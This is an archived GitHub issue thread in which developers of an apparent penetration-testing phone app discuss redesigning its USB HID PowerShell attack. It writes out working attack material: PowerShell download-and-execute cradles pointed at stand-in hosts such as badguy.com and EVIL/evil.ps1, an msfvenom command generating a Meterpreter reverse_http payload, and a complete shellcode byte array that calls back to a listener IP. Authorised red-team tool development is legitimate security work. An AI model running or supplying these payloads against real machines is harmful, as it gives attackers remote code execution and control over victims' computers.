This repository has been archived by the owner on Apr 25, 2019. It is now read-only.

Invoke-Shellcode #114

Open

mubix opened this issue Jan 10, 2016 · 9 comments

Comments

@mubix

mubix commented Jan 10, 2016

Thanks for the fixes in #113 - huge thanks to @jmingov in particular. Unfortunately "-Payload windows/meterpreter/reverse_https -Lhost 192.168.1.19 -Lport 4457" are no longer parameters of Invoke-Shellcode. It only takes a -Shellcode, -ProcessId, and -Force. I attempted to use an older version of Invoke-Shellcode but unfortunately while it did work, the updated version of Metasploit no longer accepts the payload built into them.

So my suggestions would be:

  1. Remove the "LHOST" and "LPORT" options in the app itself as it really doesn't serve a purpose now since you can't actually change that option anymore
  2. Change URL to Payload (just the text) in the app, to URL to Invoke-Shellcode.ps1 so that it's clearer what is happening/needed.
  3. Make the payload look like this: iex (New-Object Net.WebClient).DownloadString("www.badguy.com:8080"); Invoke-Shellcode -Force where www.badguy.com:8080 is the URL from the URL to Payload option as it is now.

The other option is to make it much more generic and just have the URL option and tell them it needs to be an executable powershell script and then the only thing you need to worry about is "URL to Payload" and plug it into the DownloadString.

@jmingov
Collaborator

jmingov commented Jan 10, 2016

Hello dears, @mubix @binkybear

Imo, 1, 2 and 3 are easy to do (we have them already in the code); we need to remove, not to add, for this ^^

Also the 'Other option (the generic one)' could be a great addition, so the user can have both in the app.

Jaime

binkybear added a commit that referenced this issue Jan 18, 2016
TODO:
* Add progress bar dialogue to prevent user from spamming update button
* Actually test code

#114
Signed-off-by: binkybear <[email protected]>
@binkybear
Collaborator

@mubix - After looking at Invoke-Shellcode it still looks like we can pass -Shellcode. So we can generate the shellcode with msfvenom from code:

msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.1.12 LPORT=744 -f powershell EXITFUNC=thread --platform windows -o /tmp/pwrshell_string

Then run powerball.py to make it into correct output shellcode. Finally, here is the output to /var/www/html/payload-url (TODO: we should probably change location)

iex (New-Object Net.WebClient).DownloadString("badguy.com/oopzs.ps1"); Invoke-Shellcode -Force -Shellcode @(0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x3,0x53,0x53,0x68,0xe8,0x2,0x0,0x0,0xe8,0x97,0x0,0x0,0x0,0x2f,0x41,0x6a,0x35,0x52,0x6a,0x33,0x32,0x45,0x76,0x58,0x7a,0x67,0x33,0x4f,0x48,0x64,0x74,0x6b,0x47,0x45,0x53,0x51,0x54,0x54,0x32,0x32,0x4a,0x74,0x48,0x72,0x30,0x32,0x68,0x78,0x4a,0x68,0x51,0x61,0x0,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x0,0x2,0x60,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0xa,0x5f,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x8,0x4f,0x75,0xed,0xe8,0x49,0x0,0x0,0x0,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x68,0x0,0x0,0x40,0x0,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x0,0x20,0x0,0x0,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcf,0x8b,0x7,0x1,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x8b,0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x2e,0x31,0x32,0x0,0xbb,0xe0,0x1d,0x2a,0xa,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x53,0xff,0xd5)

TODO: We should add a progress bar dialogue to the update to show users what's happening.

Here is a test APK:
MD5: 3b0e8b0ea056b880306fbbf95ecdcebe
https://transfer.sh/WjWdD/nethunter-app-release.apk

binkybear added a commit that referenced this issue Jan 21, 2016
#114

* Created progress dialogue when generating shellcode
* Will display error if shellcode doesn't generate
* Fixed layout IP bar to only take numbers and periods

Signed-off-by: binkybear <[email protected]>
@binkybear
Collaborator

Updated with progress dialogue. Updated APK for testing:

https://transfer.sh/YInuc/nethunter-app-release.apk

@thesle3p

I am concerned with something about this change: I often use the USB HID attack in NetHunter to execute PowerShell scripts other than Invoke-Shellcode. Would that still work? For example, if I were to set the URL to "http://evilhost.com/empire-agent.ps1" it wouldn't run, would it? I see the NetHunter app looks to specifically execute the Invoke-Shellcode cmdlet. Any chance an option could be added for a more generic download-and-execute attack?

@binkybear
Collaborator

I believe we plan on integrating more with empire in the future. If you want a "generic" http to powershell I think that should be separate from this attack and probably should have its own tab or be made separate.

This attack was always specific for invoke shellcode script.

@thesle3p

A more generic http to powershell tab would be really useful because I often have a need to download and execute pure powershell payloads.

On 01/28/2016 06:58 PM, binkybear wrote: (quoting the comment above)

@simonpunk

But I think these changes are taking more time to get the payload to execute on the target. First, we have to wait more than 30 seconds for msfvenom to generate the shellcode, and when we execute the attack, it again takes around 20 seconds to output the very very very long encoded strings, and sometimes it happens to report an error with PowerShell, likely because of the long encoded string. So I personally think that it is not so practical this way, and I prefer the previous edition more. But just my opinion here.

@binkybear
Collaborator

@simonpunk - Well we can easily drop the shellcode generation or maybe generate it after the attack is launched. I could also enable --smallest in msfvenom although I'm not sure how much of a difference it would make.

Another possible avenue, and probably the best, would be to add the shellcode directly to the ps1 file here: https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1#L427. Then we could skip all the HID typing of shellcode; however, you would still have to wait for msfvenom to generate it. It could probably be done early with a separate button though.

@thesle3p

To be honest it would be simple and easy to just add an option to download and execute a PowerShell script using IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

On 01/28/2016 09:26 PM, binkybear wrote: (quoting the comment above)
